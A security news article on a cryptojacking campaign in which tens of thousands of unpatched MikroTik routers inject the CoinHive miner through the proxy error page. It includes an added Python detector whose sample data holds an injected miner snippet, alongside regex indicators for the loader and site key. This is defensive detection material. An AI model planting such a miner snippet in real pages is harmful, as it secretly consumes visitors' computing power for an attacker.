Security researchers have uncovered a large-scale router compromise in which tens of thousands of routers have been reconfigured to deliver the CoinHive in-browser cryptocurrency miner to the users behind them.
The attack exploits a vulnerability in MikroTik routers which, although patched by the vendor back in April, has still not been applied by many operators - a common problem with routers, which are rarely updated once deployed. The result, according to Trustwave SpiderLabs researcher Simon Kenin, is more than 70,000 infected routers, mainly in Brazil to date but with the potential to spread worldwide.
The attackers used a legitimate feature of MikroTik's RouterOS, its built-in web proxy, to define a custom proxy error page with the CoinHive script embedded in it. Every time a user behind the router is served that error page, the script runs in the user's browser and unwittingly mines the Monero cryptocurrency for the attacker. Because the script is injected by the router in transit, only plain HTTP traffic can be modified this way; pages fetched over HTTPS are not affected. According to the researcher, the attackers initially injected the CoinHive script into every page visited, but this was presumably too noticeable, so they scaled back to the stealthier error page strategy.
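One practical check for the behaviour described above is to scan HTTP response bodies seen on the LAN side of a router (exported from a proxy log or a packet capture) for the CoinHive loader and miner instantiation. The following is an added example, not code from the article or from Trustwave; the three HTML bodies are constructed stand-ins for captured responses, and the regular expressions encode the CoinHive indicators (the `coinhive.com/lib/` loader and the `new CoinHive.Anonymous('<site key>', ...)` API call). Pulling out the site key goes beyond what the article describes; it is useful because the key identifies the account that receives the mining credit, so it lets you tie separate infections to one campaign.

```python
"""Flag HTTP response bodies that carry an injected CoinHive browser miner.

Added example (not the article's or Trustwave's code). Input is a list of
constructed (url, html) pairs standing in for responses captured behind a
router; nothing here touches the network.
"""
import re
from typing import List, Optional, Tuple

# The CoinHive loader was served from coinhive.com/lib/. Injection scripts
# often emit scheme-relative (//coinhive.com/...) and unquoted src attributes,
# so both are accepted; the capture group is the loader URL.
LOADER_RE = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?((?:https?:)?//[\w.-]*coinhive\.com/lib/[^'\"\s>]*)",
    re.IGNORECASE,
)

# CoinHive's public API: new CoinHive.Anonymous('<site key>', {...}) or
# new CoinHive.User('<site key>', ...). The site key is the attacker's account.
SITEKEY_RE = re.compile(
    r"new\s+CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9_-]{16,})['\"]",
    re.IGNORECASE,
)


def scan_html(body: str) -> Optional[dict]:
    """Return a finding for a body that references CoinHive, else None.

    A hit on either indicator is enough: an error page may carry only the
    loader on one line and the miner call on another, or only one of them.
    """
    loader = LOADER_RE.search(body)
    key = SITEKEY_RE.search(body)
    if not loader and not key:
        return None
    return {
        "loader_url": loader.group(1) if loader else None,
        "site_key": key.group(1) if key else None,
        # Heuristic only: the MikroTik campaign delivered the miner on the
        # proxy error page, so an "error" title is worth surfacing.
        "looks_like_error_page": bool(re.search(r"<title>[^<]*error", body, re.I)),
    }


def scan_responses(responses: List[Tuple[str, str]]) -> List[Tuple[str, dict]]:
    """Scan (url, html) pairs and return the URLs that carried the miner."""
    findings = []
    for url, body in responses:
        finding = scan_html(body)
        if finding is not None:
            findings.append((url, finding))
    return findings


# Constructed sample responses (not real captures).
SAMPLE_RESPONSES = [
    # 1. A proxy error page with the miner appended, as in the campaign.
    ("http://example.test/some/path", """<html><head><title>Error</title></head>
<body><h1>ERROR: The requested URL could not be retrieved</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITEKEYCONSTRUCTEDSAMPLE00', {throttle: 0.2});
  miner.start();
</script></body></html>"""),
    # 2. An ordinary page; must not be flagged.
    ("http://example.test/index.html",
     '<html><body><h1>Hello</h1><script src="/static/app.js"></script></body></html>'),
    # 3. An ordinary page with only the loader injected, scheme-relative and unquoted.
    ("http://example.test/news",
     "<html><body>news<script src=//coinhive.com/lib/coinhive.min.js></script></body></html>"),
]


if __name__ == "__main__":
    for url, finding in scan_responses(SAMPLE_RESPONSES):
        print(url, finding)
```

In a real deployment the same scan would run over bodies pulled from the proxy or IDS rather than embedded strings; a single site key recurring across many error pages is the signature of one attacker controlling many routers.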
Kenin noted in his analysis that the cryptomining/cryptojacking trend is clearly on the rise, attributing its growing popularity to better ransomware awareness among enterprises and individuals, and to the steadier payouts that compromised PCs mining cryptocurrency provide compared with ransom demands.
"This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible. This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale", he concluded in a blog post.
Javvad Malik, security advocate at AlienVault, told SC Media that the attack highlights a wider logistical problem: "As we see the number of connected devices, both in terms of IoT and other hardware such as routers, continue to grow, the challenge of keeping an inventory of all assets, and keeping them up to date, becomes increasingly difficult.
"It is why it has become imperative that manufacturers employ rigorous security testing during the product development phase, as well as retaining easy and efficient means through which these devices can be updated. Unfortunately, the answer is seldom as simple as this, as there is usually a supply chain with many parties contributing to the various aspects of software, hardware, white labelling, etc., before it gets to the customer. And securing this entire chain is challenging to say the least."